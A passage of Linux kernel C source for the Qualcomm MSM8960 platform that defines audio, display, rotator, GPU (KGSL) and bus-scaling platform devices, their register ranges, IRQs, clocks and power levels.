.name = "msm-stub-codec",
.id = 1,
};
struct platform_device msm_voice = {
.name = "msm-pcm-voice",
.id = -1,
};
struct platform_device msm_voip = {
.name = "msm-voip-dsp",
.id = -1,
};
struct platform_device msm_lpa_pcm = {
.name = "msm-pcm-lpa",
.id = -1,
};
struct platform_device msm_compr_dsp = {
.name = "msm-compr-dsp",
.id = -1,
};
struct platform_device msm_pcm_hostless = {
.name = "msm-pcm-hostless",
.id = -1,
};
struct platform_device msm_cpudai_afe_01_rx = {
.name = "msm-dai-q6",
.id = 0xE0,
};
struct platform_device msm_cpudai_afe_01_tx = {
.name = "msm-dai-q6",
.id = 0xF0,
};
struct platform_device msm_cpudai_afe_02_rx = {
.name = "msm-dai-q6",
.id = 0xF1,
};
struct platform_device msm_cpudai_afe_02_tx = {
.name = "msm-dai-q6",
.id = 0xE1,
};
struct platform_device msm_pcm_afe = {
.name = "msm-pcm-afe",
.id = -1,
};
static struct fs_driver_data gfx2d0_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_GRAPHICS_2D_CORE0,
};
static struct fs_driver_data gfx2d1_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_GRAPHICS_2D_CORE1,
};
static struct fs_driver_data gfx3d_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk", .reset_rate = 27000000 },
{ .name = "iface_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_GRAPHICS_3D,
};
static struct fs_driver_data gfx3d_fs_data_8960ab = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk", .reset_rate = 27000000 },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_GRAPHICS_3D,
.bus_port1 = MSM_BUS_MASTER_GRAPHICS_3D_PORT1,
};
static struct fs_driver_data ijpeg_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_JPEG_ENC,
};
static struct fs_driver_data mdp_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ .name = "vsync_clk" },
{ .name = "lut_clk" },
{ .name = "tv_src_clk" },
{ .name = "tv_clk" },
{ .name = "reset1_clk" },
{ .name = "reset2_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_MDP_PORT0,
.bus_port1 = MSM_BUS_MASTER_MDP_PORT1,
};
static struct fs_driver_data rot_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_ROTATOR,
};
static struct fs_driver_data ved_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_HD_CODEC_PORT0,
.bus_port1 = MSM_BUS_MASTER_HD_CODEC_PORT1,
};
static struct fs_driver_data ved_fs_data_8960ab = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_VIDEO_DEC,
.bus_port1 = MSM_BUS_MASTER_VIDEO_ENC,
};
static struct fs_driver_data vfe_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_VFE,
};
static struct fs_driver_data vpe_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_VPE,
};
struct platform_device *msm8960_footswitch[] __initdata = {
FS_8X60(FS_MDP, "vdd", "mdp.0", &mdp_fs_data),
FS_8X60(FS_ROT, "vdd", "msm_rotator.0", &rot_fs_data),
FS_8X60(FS_IJPEG, "vdd", "msm_gemini.0", &ijpeg_fs_data),
FS_8X60(FS_VFE, "vdd", "msm_vfe.0", &vfe_fs_data),
FS_8X60(FS_VPE, "vdd", "msm_vpe.0", &vpe_fs_data),
FS_8X60(FS_GFX3D, "vdd", "kgsl-3d0.0", &gfx3d_fs_data),
FS_8X60(FS_GFX2D0, "vdd", "kgsl-2d0.0", &gfx2d0_fs_data),
FS_8X60(FS_GFX2D1, "vdd", "kgsl-2d1.1", &gfx2d1_fs_data),
FS_8X60(FS_VED, "vdd", "msm_vidc.0", &ved_fs_data),
};
unsigned msm8960_num_footswitch __initdata = ARRAY_SIZE(msm8960_footswitch);
struct platform_device *msm8960ab_footswitch[] __initdata = {
FS_8X60(FS_MDP, "vdd", "mdp.0", &mdp_fs_data),
FS_8X60(FS_ROT, "vdd", "msm_rotator.0", &rot_fs_data),
FS_8X60(FS_IJPEG, "vdd", "msm_gemini.0", &ijpeg_fs_data),
FS_8X60(FS_VFE, "vdd", "msm_vfe.0", &vfe_fs_data),
FS_8X60(FS_VPE, "vdd", "msm_vpe.0", &vpe_fs_data),
FS_8X60(FS_GFX3D, "vdd", "kgsl-3d0.0", &gfx3d_fs_data_8960ab),
FS_8X60(FS_VED, "vdd", "msm_vidc.0", &ved_fs_data_8960ab),
};
unsigned msm8960ab_num_footswitch __initdata = ARRAY_SIZE(msm8960ab_footswitch);
#ifdef CONFIG_MSM_ROTATOR
static struct msm_bus_vectors rotator_init_vectors[] = {
{
.src = MSM_BUS_MASTER_ROTATOR,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
};
static struct msm_bus_vectors rotator_ui_vectors[] = {
{
.src = MSM_BUS_MASTER_ROTATOR,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = (1024 * 600 * 4 * 2 * 60),
.ib = (1024 * 600 * 4 * 2 * 60 * 1.5),
},
};
static struct msm_bus_vectors rotator_vga_vectors[] = {
{
.src = MSM_BUS_MASTER_ROTATOR,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = (640 * 480 * 2 * 2 * 30),
.ib = (640 * 480 * 2 * 2 * 30 * 1.5),
},
};
static struct msm_bus_vectors rotator_720p_vectors[] = {
{
.src = MSM_BUS_MASTER_ROTATOR,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = (1280 * 736 * 2 * 2 * 30),
.ib = (1280 * 736 * 2 * 2 * 30 * 1.5),
},
};
static struct msm_bus_vectors rotator_1080p_vectors[] = {
{
.src = MSM_BUS_MASTER_ROTATOR,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = (1920 * 1088 * 2 * 2 * 30),
.ib = (1920 * 1088 * 2 * 2 * 30 * 1.5),
},
};
static struct msm_bus_paths rotator_bus_scale_usecases[] = {
{
ARRAY_SIZE(rotator_init_vectors),
rotator_init_vectors,
},
{
ARRAY_SIZE(rotator_ui_vectors),
rotator_ui_vectors,
},
{
ARRAY_SIZE(rotator_vga_vectors),
rotator_vga_vectors,
},
{
ARRAY_SIZE(rotator_720p_vectors),
rotator_720p_vectors,
},
{
ARRAY_SIZE(rotator_1080p_vectors),
rotator_1080p_vectors,
},
};
struct msm_bus_scale_pdata rotator_bus_scale_pdata = {
rotator_bus_scale_usecases,
ARRAY_SIZE(rotator_bus_scale_usecases),
.name = "rotator",
};
void __init msm_rotator_update_bus_vectors(unsigned int xres,
unsigned int yres)
{
rotator_ui_vectors[0].ab = xres * yres * 4 * 2 * 60;
rotator_ui_vectors[0].ib = xres * yres * 4 * 2 * 60 * 3 / 2;
}
#define ROTATOR_HW_BASE 0x04E00000
static struct resource resources_msm_rotator[] = {
{
.start = ROTATOR_HW_BASE,
.end = ROTATOR_HW_BASE + 0x100000 - 1,
.flags = IORESOURCE_MEM,
},
{
.start = ROT_IRQ,
.end = ROT_IRQ,
.flags = IORESOURCE_IRQ,
},
};
static struct msm_rot_clocks rotator_clocks[] = {
{
.clk_name = "core_clk",
.clk_type = ROTATOR_CORE_CLK,
.clk_rate = 200 * 1000 * 1000,
},
{
.clk_name = "iface_clk",
.clk_type = ROTATOR_PCLK,
.clk_rate = 0,
},
};
static struct msm_rotator_platform_data rotator_pdata = {
.number_of_clocks = ARRAY_SIZE(rotator_clocks),
.hardware_version_number = 0x01020309,
.rotator_clks = rotator_clocks,
#ifdef CONFIG_MSM_BUS_SCALING
.bus_scale_table = &rotator_bus_scale_pdata,
#endif
};
struct platform_device msm_rotator_device = {
.name = "msm_rotator",
.id = 0,
.num_resources = ARRAY_SIZE(resources_msm_rotator),
.resource = resources_msm_rotator,
.dev = {
.platform_data = &rotator_pdata,
},
};
void __init msm_rotator_set_split_iommu_domain(void)
{
rotator_pdata.rot_iommu_split_domain = 1;
}
#endif
#define MIPI_DSI_HW_BASE 0x04700000
#define MDP_HW_BASE 0x05100000
static struct resource msm_mipi_dsi1_resources[] = {
{
.name = "mipi_dsi",
.start = MIPI_DSI_HW_BASE,
.end = MIPI_DSI_HW_BASE + 0x000F0000 - 1,
.flags = IORESOURCE_MEM,
},
{
.start = DSI1_IRQ,
.end = DSI1_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm_mipi_dsi1_device = {
.name = "mipi_dsi",
.id = 1,
.num_resources = ARRAY_SIZE(msm_mipi_dsi1_resources),
.resource = msm_mipi_dsi1_resources,
};
static struct resource msm_mdp_resources[] = {
{
.name = "mdp",
.start = MDP_HW_BASE,
.end = MDP_HW_BASE + 0x000F0000 - 1,
.flags = IORESOURCE_MEM,
},
{
.start = MDP_IRQ,
.end = MDP_IRQ,
.flags = IORESOURCE_IRQ,
},
};
static struct platform_device msm_mdp_device = {
.name = "mdp",
.id = 0,
.num_resources = ARRAY_SIZE(msm_mdp_resources),
.resource = msm_mdp_resources,
};
static void __init msm_register_device(struct platform_device *pdev, void *data)
{
int ret;
pdev->dev.platform_data = data;
ret = platform_device_register(pdev);
if (ret)
dev_err(&pdev->dev,
"%s: platform_device_register() failed = %d\n",
__func__, ret);
}
#ifdef CONFIG_MSM_BUS_SCALING
static struct platform_device msm_dtv_device = {
.name = "dtv",
.id = 0,
};
#endif
struct platform_device msm_lvds_device = {
.name = "lvds",
.id = 0,
};
void __init msm_fb_register_device(char *name, void *data)
{
if (!strncmp(name, "mdp", 3))
msm_register_device(&msm_mdp_device, data);
else if (!strncmp(name, "mipi_dsi", 8))
msm_register_device(&msm_mipi_dsi1_device, data);
else if (!strncmp(name, "lvds", 4))
msm_register_device(&msm_lvds_device, data);
#ifdef CONFIG_MSM_BUS_SCALING
else if (!strncmp(name, "dtv", 3))
msm_register_device(&msm_dtv_device, data);
#endif
else
printk(KERN_ERR "%s: unknown device! %s\n", __func__, name);
}
static struct resource resources_sps[] = {
{
.name = "pipe_mem",
.start = 0x12800000,
.end = 0x12800000 + 0x4000 - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bamdma_dma",
.start = 0x12240000,
.end = 0x12240000 + 0x1000 - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bamdma_bam",
.start = 0x12244000,
.end = 0x12244000 + 0x4000 - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bamdma_irq",
.start = SPS_BAM_DMA_IRQ,
.end = SPS_BAM_DMA_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct msm_sps_platform_data msm_sps_pdata = {
.bamdma_restricted_pipes = 0x06,
};
struct platform_device msm_device_sps = {
.name = "msm_sps",
.id = -1,
.num_resources = ARRAY_SIZE(resources_sps),
.resource = resources_sps,
.dev.platform_data = &msm_sps_pdata,
};
#ifdef CONFIG_MSM_MPM
static uint16_t msm_mpm_irqs_m2a[MSM_MPM_NR_MPM_IRQS] __initdata = {
[1] = MSM_GPIO_TO_INT(46),
[2] = MSM_GPIO_TO_INT(150),
[4] = MSM_GPIO_TO_INT(103),
[5] = MSM_GPIO_TO_INT(104),
[6] = MSM_GPIO_TO_INT(105),
[7] = MSM_GPIO_TO_INT(106),
[8] = MSM_GPIO_TO_INT(107),
[9] = MSM_GPIO_TO_INT(7),
[10] = MSM_GPIO_TO_INT(11),
[11] = MSM_GPIO_TO_INT(15),
[12] = MSM_GPIO_TO_INT(19),
[13] = MSM_GPIO_TO_INT(23),
[14] = MSM_GPIO_TO_INT(27),
[15] = MSM_GPIO_TO_INT(31),
[16] = MSM_GPIO_TO_INT(35),
[19] = MSM_GPIO_TO_INT(90),
[20] = MSM_GPIO_TO_INT(92),
[23] = MSM_GPIO_TO_INT(85),
[24] = MSM_GPIO_TO_INT(83),
[25] = USB1_HS_IRQ,
[27] = HDMI_IRQ,
[29] = MSM_GPIO_TO_INT(10),
[30] = MSM_GPIO_TO_INT(102),
[31] = MSM_GPIO_TO_INT(81),
[32] = MSM_GPIO_TO_INT(78),
[33] = MSM_GPIO_TO_INT(94),
[34] = MSM_GPIO_TO_INT(72),
[35] = MSM_GPIO_TO_INT(39),
[36] = MSM_GPIO_TO_INT(43),
[37] = MSM_GPIO_TO_INT(61),
[38] = MSM_GPIO_TO_INT(50),
[39] = MSM_GPIO_TO_INT(42),
[41] = MSM_GPIO_TO_INT(62),
[42] = MSM_GPIO_TO_INT(76),
[43] = MSM_GPIO_TO_INT(75),
[44] = MSM_GPIO_TO_INT(70),
[45] = MSM_GPIO_TO_INT(69),
[46] = MSM_GPIO_TO_INT(67),
[47] = MSM_GPIO_TO_INT(65),
[48] = MSM_GPIO_TO_INT(58),
[49] = MSM_GPIO_TO_INT(54),
[50] = MSM_GPIO_TO_INT(52),
[51] = MSM_GPIO_TO_INT(49),
[52] = MSM_GPIO_TO_INT(40),
[53] = MSM_GPIO_TO_INT(37),
[54] = MSM_GPIO_TO_INT(24),
[55] = MSM_GPIO_TO_INT(14),
};
static uint16_t msm_mpm_bypassed_apps_irqs[] __initdata = {
TLMM_MSM_SUMMARY_IRQ,
RPM_APCC_CPU0_GP_HIGH_IRQ,
RPM_APCC_CPU0_GP_MEDIUM_IRQ,
RPM_APCC_CPU0_GP_LOW_IRQ,
RPM_APCC_CPU0_WAKE_UP_IRQ,
RPM_APCC_CPU1_GP_HIGH_IRQ,
RPM_APCC_CPU1_GP_MEDIUM_IRQ,
RPM_APCC_CPU1_GP_LOW_IRQ,
RPM_APCC_CPU1_WAKE_UP_IRQ,
MSS_TO_APPS_IRQ_0,
MSS_TO_APPS_IRQ_1,
MSS_TO_APPS_IRQ_2,
MSS_TO_APPS_IRQ_3,
MSS_TO_APPS_IRQ_4,
MSS_TO_APPS_IRQ_5,
MSS_TO_APPS_IRQ_6,
MSS_TO_APPS_IRQ_7,
MSS_TO_APPS_IRQ_8,
MSS_TO_APPS_IRQ_9,
LPASS_SCSS_GP_LOW_IRQ,
LPASS_SCSS_GP_MEDIUM_IRQ,
LPASS_SCSS_GP_HIGH_IRQ,
SPS_MTI_30,
SPS_MTI_31,
RIVA_APSS_SPARE_IRQ,
RIVA_APPS_WLAN_SMSM_IRQ,
RIVA_APPS_WLAN_RX_DATA_AVAIL_IRQ,
RIVA_APPS_WLAN_DATA_XFER_DONE_IRQ,
};
struct msm_mpm_device_data msm8960_mpm_dev_data __initdata = {
.irqs_m2a = msm_mpm_irqs_m2a,
.irqs_m2a_size = ARRAY_SIZE(msm_mpm_irqs_m2a),
.bypassed_apps_irqs = msm_mpm_bypassed_apps_irqs,
.bypassed_apps_irqs_size = ARRAY_SIZE(msm_mpm_bypassed_apps_irqs),
.mpm_request_reg_base = MSM_RPM_BASE + 0x9d8,
.mpm_status_reg_base = MSM_RPM_BASE + 0xdf8,
.mpm_apps_ipc_reg = MSM_APCS_GCC_BASE + 0x008,
.mpm_apps_ipc_val = BIT(1),
.mpm_ipc_irq = RPM_APCC_CPU0_GP_MEDIUM_IRQ,
};
#endif
#define LPASS_SLIMBUS_PHYS 0x28080000
#define LPASS_SLIMBUS_BAM_PHYS 0x28084000
#define LPASS_SLIMBUS_SLEW (MSM8960_TLMM_PHYS + 0x207C)
/* Board info for the slimbus slave device */
static struct resource slimbus_res[] = {
{
.start = LPASS_SLIMBUS_PHYS,
.end = LPASS_SLIMBUS_PHYS + 8191,
.flags = IORESOURCE_MEM,
.name = "slimbus_physical",
},
{
.start = LPASS_SLIMBUS_BAM_PHYS,
.end = LPASS_SLIMBUS_BAM_PHYS + 8191,
.flags = IORESOURCE_MEM,
.name = "slimbus_bam_physical",
},
{
.start = LPASS_SLIMBUS_SLEW,
.end = LPASS_SLIMBUS_SLEW + 4 - 1,
.flags = IORESOURCE_MEM,
.name = "slimbus_slew_reg",
},
{
.start = SLIMBUS0_CORE_EE1_IRQ,
.end = SLIMBUS0_CORE_EE1_IRQ,
.flags = IORESOURCE_IRQ,
.name = "slimbus_irq",
},
{
.start = SLIMBUS0_BAM_EE1_IRQ,
.end = SLIMBUS0_BAM_EE1_IRQ,
.flags = IORESOURCE_IRQ,
.name = "slimbus_bam_irq",
},
};
struct platform_device msm_slim_ctrl = {
.name = "msm_slim_ctrl",
.id = 1,
.num_resources = ARRAY_SIZE(slimbus_res),
.resource = slimbus_res,
.dev = {
.coherent_dma_mask = 0xffffffffULL,
},
};
static struct msm_dcvs_freq_entry grp3d_freq[] = {
{0, 900, 0, 0, 0},
{0, 950, 0, 0, 0},
{0, 950, 0, 0, 0},
{0, 1200, 1, 100, 100},
};
static struct msm_dcvs_freq_entry grp2d_freq[] = {
{0, 900, 0, 0, 0},
{0, 950, 1, 100, 100},
};
static struct msm_dcvs_core_info grp3d_core_info = {
.freq_tbl = &grp3d_freq[0],
.core_param = {
.core_type = MSM_DCVS_CORE_TYPE_GPU,
},
.algo_param = {
.disable_pc_threshold = 0,
.em_win_size_min_us = 100000,
.em_win_size_max_us = 300000,
.em_max_util_pct = 97,
.group_id = 0,
.max_freq_chg_time_us = 100000,
.slack_mode_dynamic = 0,
.slack_weight_thresh_pct = 0,
.slack_time_min_us = 39000,
.slack_time_max_us = 39000,
.ss_win_size_min_us = 1000000,
.ss_win_size_max_us = 1000000,
.ss_util_pct = 95,
.ss_no_corr_below_freq = 0,
},
.energy_coeffs = {
.active_coeff_a = 2492,
.active_coeff_b = 0,
.active_coeff_c = 0,
.leakage_coeff_a = -17720,
.leakage_coeff_b = 37,
.leakage_coeff_c = 2729,
.leakage_coeff_d = -277,
},
.power_param = {
.current_temp = 25,
.num_freq = ARRAY_SIZE(grp3d_freq),
}
};
static struct msm_dcvs_core_info grp2d_core_info = {
.freq_tbl = &grp2d_freq[0],
.core_param = {
.core_type = MSM_DCVS_CORE_TYPE_GPU,
},
.algo_param = {
.disable_pc_threshold = 0,
.em_win_size_min_us = 100000,
.em_win_size_max_us = 300000,
.em_max_util_pct = 97,
.group_id = 0,
.max_freq_chg_time_us = 100000,
.slack_mode_dynamic = 0,
.slack_weight_thresh_pct = 0,
.slack_time_min_us = 39000,
.slack_time_max_us = 39000,
.ss_win_size_min_us = 1000000,
.ss_win_size_max_us = 1000000,
.ss_util_pct = 95,
.ss_no_corr_below_freq = 0,
},
.energy_coeffs = {
.active_coeff_a = 2492,
.active_coeff_b = 0,
.active_coeff_c = 0,
.leakage_coeff_a = -17720,
.leakage_coeff_b = 37,
.leakage_coeff_c = 2729,
.leakage_coeff_d = -277,
},
.power_param = {
.current_temp = 25,
.num_freq = ARRAY_SIZE(grp2d_freq),
}
};
#ifdef CONFIG_MSM_BUS_SCALING
static struct msm_bus_vectors grp3d_init_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_3D,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
};
static struct msm_bus_vectors grp3d_low_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_3D,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(1000),
},
};
static struct msm_bus_vectors grp3d_nominal_low_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_3D,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(2048),
},
};
static struct msm_bus_vectors grp3d_nominal_high_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_3D,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(2656),
},
};
static struct msm_bus_vectors grp3d_max_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_3D,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(3968),
},
};
static struct msm_bus_paths grp3d_bus_scale_usecases[] = {
{
ARRAY_SIZE(grp3d_init_vectors),
grp3d_init_vectors,
},
{
ARRAY_SIZE(grp3d_low_vectors),
grp3d_low_vectors,
},
{
ARRAY_SIZE(grp3d_nominal_low_vectors),
grp3d_nominal_low_vectors,
},
{
ARRAY_SIZE(grp3d_nominal_high_vectors),
grp3d_nominal_high_vectors,
},
{
ARRAY_SIZE(grp3d_max_vectors),
grp3d_max_vectors,
},
};
static struct msm_bus_scale_pdata grp3d_bus_scale_pdata = {
grp3d_bus_scale_usecases,
ARRAY_SIZE(grp3d_bus_scale_usecases),
.name = "grp3d",
};
static struct msm_bus_vectors grp2d0_init_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_2D_CORE0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
};
static struct msm_bus_vectors grp2d0_nominal_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_2D_CORE0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(1000),
},
};
static struct msm_bus_vectors grp2d0_max_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_2D_CORE0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(2048),
},
};
static struct msm_bus_paths grp2d0_bus_scale_usecases[] = {
{
ARRAY_SIZE(grp2d0_init_vectors),
grp2d0_init_vectors,
},
{
ARRAY_SIZE(grp2d0_nominal_vectors),
grp2d0_nominal_vectors,
},
{
ARRAY_SIZE(grp2d0_max_vectors),
grp2d0_max_vectors,
},
};
struct msm_bus_scale_pdata grp2d0_bus_scale_pdata = {
grp2d0_bus_scale_usecases,
ARRAY_SIZE(grp2d0_bus_scale_usecases),
.name = "grp2d0",
};
static struct msm_bus_vectors grp2d1_init_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_2D_CORE1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
};
static struct msm_bus_vectors grp2d1_nominal_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_2D_CORE1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(1000),
},
};
static struct msm_bus_vectors grp2d1_max_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_2D_CORE1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(2048),
},
};
static struct msm_bus_paths grp2d1_bus_scale_usecases[] = {
{
ARRAY_SIZE(grp2d1_init_vectors),
grp2d1_init_vectors,
},
{
ARRAY_SIZE(grp2d1_nominal_vectors),
grp2d1_nominal_vectors,
},
{
ARRAY_SIZE(grp2d1_max_vectors),
grp2d1_max_vectors,
},
};
struct msm_bus_scale_pdata grp2d1_bus_scale_pdata = {
grp2d1_bus_scale_usecases,
ARRAY_SIZE(grp2d1_bus_scale_usecases),
.name = "grp2d1",
};
#endif
struct resource kgsl_3d0_resources_8960ab[] = {
{
.name = KGSL_3D0_REG_MEMORY,
.start = 0x04300000, /* GFX3D address */
.end = 0x0430ffff,
.flags = IORESOURCE_MEM,
},
{
.name = KGSL_3D0_SHADER_MEMORY,
.start = 0x04310000, /* Shader Mem Address (8960AB) */
.end = 0x0431ffff,
.flags = IORESOURCE_MEM,
},
{
.name = KGSL_3D0_IRQ,
.start = GFX3D_IRQ,
.end = GFX3D_IRQ,
.flags = IORESOURCE_IRQ,
},
};
int kgsl_num_resources_8960ab = ARRAY_SIZE(kgsl_3d0_resources_8960ab);
static struct resource kgsl_3d0_resources_8960[] = {
{
.name = KGSL_3D0_REG_MEMORY,
.start = 0x04300000, /* GFX3D address */
.end = 0x0431ffff,
.flags = IORESOURCE_MEM,
},
{
.name = KGSL_3D0_IRQ,
.start = GFX3D_IRQ,
.end = GFX3D_IRQ,
.flags = IORESOURCE_IRQ,
},
};
static const struct kgsl_iommu_ctx kgsl_3d0_iommu0_ctxs[] = {
{ "gfx3d_user", 0 },
{ "gfx3d_priv", 1 },
};
static const struct kgsl_iommu_ctx kgsl_3d0_iommu1_ctxs[] = {
{ "gfx3d1_user", 0 },
{ "gfx3d1_priv", 1 },
};
static struct kgsl_device_iommu_data kgsl_3d0_iommu_data[] = {
{
.iommu_ctxs = kgsl_3d0_iommu0_ctxs,
.iommu_ctx_count = ARRAY_SIZE(kgsl_3d0_iommu0_ctxs),
.physstart = 0x07C00000,
.physend = 0x07C00000 + SZ_1M - 1,
},
{
.iommu_ctxs = kgsl_3d0_iommu1_ctxs,
.iommu_ctx_count = ARRAY_SIZE(kgsl_3d0_iommu1_ctxs),
.physstart = 0x07D00000,
.physend = 0x07D00000 + SZ_1M - 1,
},
};
static struct kgsl_device_platform_data kgsl_3d0_pdata = {
.pwrlevel = {
{
.gpu_freq = 487500000,
.bus_freq = 5,
.io_fraction = 0,
},
{
.gpu_freq = 400000000,
.bus_freq = 4,
.io_fraction = 0,
},
{
.gpu_freq = 325000000,
.bus_freq = 3,
.io_fraction = 33,
},
{
.gpu_freq = 200000000,
.bus_freq = 2,
.io_fraction = 100,
},
{
.gpu_freq = 128000000,
.bus_freq = 1,
.io_fraction = 100,
},
{
.gpu_freq = 27000000,
.bus_freq = 0,
},
},
.init_level = 1,
.num_levels = 5, //ARRAY_SIZE(grp3d_freq) + 1,
.set_grp_async = NULL,
.idle_timeout = HZ/12,
.clk_map = KGSL_CLK_CORE | KGSL_CLK_IFACE | KGSL_CLK_MEM_IFACE,
#ifdef CONFIG_MSM_BUS_SCALING
.bus_scale_table = &grp3d_bus_scale_pdata,
#endif
.iommu_data = kgsl_3d0_iommu_data,
.iommu_count = ARRAY_SIZE(kgsl_3d0_iommu_data),
.core_info = &grp3d_core_info,
};
struct platform_device msm_kgsl_3d0 = {
.name = "kgsl-3d0",
.id = 0,
.num_resources = ARRAY_SIZE(kgsl_3d0_resources_8960),
.resource = kgsl_3d0_resources_8960,
.dev = {
.platform_data = &kgsl_3d0_pdata,
},
};
static struct resource kgsl_2d0_resources[] = {
{
.name = KGSL_2D0_REG_MEMORY,
.start = 0x04100000, /* Z180 base address */
.end = 0x04100FFF,
.flags = IORESOURCE_MEM,
},
{
.name = KGSL_2D0_IRQ,
.start = GFX2D0_IRQ,
.end = GFX2D0_IRQ,
.flags = IORESOURCE_IRQ,
},
};
static const struct kgsl_iommu_ctx kgsl_2d0_iommu_ctxs[] = {
{ "gfx2d0_2d0", 0 },
};
static struct kgsl_device_iommu_data kgsl_2d0_iommu_data[] = {
{
.iommu_ctxs = kgsl_2d0_iommu_ctxs,
.iommu_ctx_count = ARRAY_SIZE(kgsl_2d0_iommu_ctxs),
.physstart = 0x07D00000,
.physend = 0x07D00000 + SZ_1M - 1,
},
};
static struct kgsl_device_platform_data kgsl_2d0_pdata = {
.pwrlevel = {
{
.gpu_freq = 200000000,
.bus_freq = 2,
},
{
.gpu_freq = 96000000,
.bus_freq = 1,
},
{
.gpu_freq = 27000000,
.bus_freq = 0,
},
},
.init_level = 0,
.num_levels = ARRAY_SIZE(grp2d_freq) + 1,
.set_grp_async = NULL,
.idle_timeout = HZ/5,
.clk_map = KGSL_CLK_CORE | KGSL_CLK_IFACE,
#ifdef CONFIG_MSM_BUS_SCALING
.bus_scale_table = &grp2d0_bus_scale_pdata,
#endif
.iommu_data = kgsl_2d0_iommu_data,
.iommu_count = ARRAY_SIZE(kgsl_2d0_iommu_data),
.core_info = &grp2d_core_info,
};
struct platform_device msm_kgsl_2d0 = {
.name = "kgsl-2d0",
.id = 0,
.num_resources = ARRAY_SIZE(kgsl_2d0_resources),
.resource = kgsl_2d0_resources,
.dev = {
.platform_data = &kgsl_2d0_pdata,
},
};
static const struct kgsl_iommu_ctx kgsl_2d1_iommu_ctxs[] = {
{ "gfx2d1_2d1", 0 },
};
static struct kgsl_device_iommu_data kgsl_2d1_iommu_data[] = {
{
.iommu_ctxs = kgsl_2d1_iommu_ctxs,
.iommu_ctx_count = ARRAY_SIZE(kgsl_2d1_iommu_ctxs),
.physstart = 0x07E00000,
.physend = 0x07E00000 + SZ_1M - 1,
},
};
static struct resource kgsl_2d1_resources[] = {
{
.name = KGSL_2D1_REG_MEMORY,
.start = 0x04200000, /* Z180 device 1 base address */
.end = 0x04200FFF,
.flags = IORESOURCE_MEM,
},
{
.name = KGSL_2D1_IRQ,
.start = GFX2D1_IRQ,
.end = GFX2D1_IRQ,
.flags = IORESOURCE_IRQ,
},
};
static struct kgsl_device_platform_data kgsl_2d1_pdata = {
.pwrlevel = {
{
.gpu_freq = 200000000,
.bus_freq = 2,
},
{
.gpu_freq = 96000000,
.bus_freq = 1,
},
{
.gpu_freq = 27000000,
.bus_freq = 0,
},
},
.init_level = 0,
